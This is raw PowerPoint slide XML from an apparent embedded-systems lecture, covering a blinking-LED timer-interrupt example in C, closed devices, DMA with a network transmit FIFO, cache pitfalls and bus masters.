          <p:cNvPr id="29699"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ledInit</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 LED =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UINT32*)(LED_ADDR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	*LED = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">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ledToggle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 LED =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UINT32*)(LED_ADDR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	*LED ^= 1;</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0182565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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Blinking LED – Timer.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1503363"/>
            <a:ext cx="7848600" cy="4770437"/>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TIMER_INTERVAL_500MS (0x001C2000)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>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flag will be set when timer expires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>volatile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pTimerFlags</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timerInit</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volatile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flag)</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 Acknowledge any outstanding interrupts.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(TIMER_0_MATCH, TIMER_STATUS_REG); </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 Initialize the timer interval.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lr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(TIMER_COUNT_REG) +	TIMER_INTERVAL_500MS, 		TIMER_0_MATCH_REG);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pTimerFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = flag;</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 Enable the timer interrupt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lr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(TIMER_INT_ENABLE_REG) | TIMER_0_INTEN, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		 TIMER_INT_ENABLE_REG); </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1180132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smtClean="0"/>
              <a:t>Blinking LED – Timer.c (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2057400"/>
            <a:ext cx="7848600" cy="341630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_Interrupt1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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 Acknowledge the timer 0 interrupt. */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(TIMER_0_MATCH, TIMER_STATUS_REG);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flag the application that timer expired*/ 	*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pTimerFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=1;</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Set the new timer interval. */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(TIMER_COUNT_REG) +	TIMER_INTERVAL_500MS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		TIMER_0_MATCH_REG); </a:t>
            </a:r>
          </a:p>
          <a:p>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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3128572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US" smtClean="0"/>
              <a:t>Closed System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>“Single Function Device”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Only device vendor controls software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Allows optimizing at the lowest level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Specialized operating system and OS services (file system, network stack, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16621594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lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Direct Memory Access – DMA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>DMA refers to the ability of the peripheral hardware to access the system memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>This is especially useful when there are big amounts of data that go through the hardware / firmware interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>In this case the firmware provides pointers to its memory, communicates them through the register interface (PMIO or MMIO)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>In many cases the device has specific requirements on the memory pointers (certain address space, alignment requirements, size etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15383870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smtClean="0"/>
              <a:t>DMA Example – network device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Hardware defines a cyclic Transmit FIFO structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Each packet has a 16-byte header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Packet length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Other instructions to hardware on how to transmit the packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Must be 16-byte aligned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Followed by the packet itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Hardware interface consists of 4 registers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>START – beginning of FIFO, programmed by firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>LEN – length of FIFO, programmed by firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HEAD – start of next packet header to be transmitted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>TAIL – first “free” address after </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6624436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4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3274699876"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1474788" y="641350"/>
          <a:ext cx="6194425" cy="5194300"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s12328" name="Visio" r:id="rId3" imgW="2920677" imgH="2448992" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="2920677" imgH="2448992" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId4"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="1474788" y="641350"/>
                        <a:ext cx="6194425" cy="5194300"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63739671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dirty="0" smtClean="0"/>
              <a:t>Network Device: Firmware flows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Initialization:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Allocate a buffer for FIFO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Set the START and LEN registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Transmit packet:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If TAIL + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(header) + packet.len &gt; HEAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Packet cannot fit into FIFO, wait or return error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Copy header to TAIL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Copy packet to TAIL + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(header)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>TAIL += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(header) + packet.len </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All calculations are modulo LEN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309105134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dirty="0" smtClean="0"/>
              <a:t>Network Device: Hardware Logic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>While (TAIL != HEAD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>packet.len = ((header*)HEAD)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>len</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Transmit packet at HEAD + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(header)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HEAD += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(header) +packet.len</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All calculations are modulo LEN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15304524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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DMA “gotcha” – caching</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211977" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4419600"/>
            <a:ext cx="8305800" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Solutions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Mark FIFO as “non-cacheable”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Flush and invalidate cache before advancing “TAIL”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2050" name="Object 12"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2057400" y="1600200"/>
          <a:ext cx="4038600" cy="2679700"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s13350" name="Visio" r:id="rId3" imgW="2551481" imgH="1692250" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="2551481" imgH="1692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4038600" cy="2679700"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="468849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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bus Masters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Devices can be connected to the CPU through the memory bus or the IO bus only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
